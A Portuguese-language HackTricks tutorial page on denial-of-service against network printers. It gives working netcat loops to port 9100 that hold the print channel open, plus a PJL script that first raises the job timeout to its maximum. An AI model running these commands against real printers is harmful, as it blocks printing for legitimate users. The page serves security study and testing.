4 KiB
Aprenda hacking em AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud no github.
Se os trabalhos de impressão são processados em série – o que se assume para a maioria dos dispositivos – apenas um trabalho pode ser tratado por vez. Se este trabalho não terminar efetivamente, o canal de impressão fica bloqueado até que um timeout seja acionado, impedindo que usuários legítimos imprimam.
DoS Básico:
while true; do nc printer 9100; done
Este ataque trivial de negação de serviço pode ser aprimorado definindo um valor alto de timeout com PJL, assim o número de conexões que um atacante precisa fazer é minimizado enquanto fica ainda mais difícil para usuários legítimos conseguirem um intervalo de tempo livre:
# get maximum timeout value with PJL
MAX="`echo "@PJL INFO VARIABLES" | nc -w3 printer 9100 |\
grep -E -A2 '^TIMEOUT=' | tail -n1 | awk '{print $1}'`"
# connect and set maximum timeout for current job with PJL
while true; do echo "@PJL SET TIMEOUT=$MAX" | nc printer 9100; done
Você pode usar o PRET para encontrar as configurações de timeout:
./pret.py -q printer pjl
Connection to printer established
Welcome to the pret shell. Type help or ? to list commands.
printer:/> env timeout
TIMEOUT=15 [2 RANGE]
5
300
Enquanto a referência PJL especifica um tempo máximo de espera de 300 segundos, na prática os tempos máximos de espera PJL podem variar de 15 a 2147483 segundos. Observe que mesmo os trabalhos de impressão recebidos de outros canais de impressão como IPP ou LPD não são mais processados enquanto a conexão permanecer aberta.
Saiba mais sobre este ataque em http://hacking-printers.net/wiki/index.php/Transmission_channel
Aprenda hacking em AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert)!
Outras formas de apoiar o HackTricks:
- Se você quer ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF, confira os PLANOS DE ASSINATURA!
- Adquira o material oficial PEASS & HackTricks
- Descubra A Família PEASS, nossa coleção de NFTs exclusivos
- Junte-se ao grupo 💬 Discord ou ao grupo telegram ou siga-me no Twitter 🐦 @carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para os repositórios do HackTricks e HackTricks Cloud no github.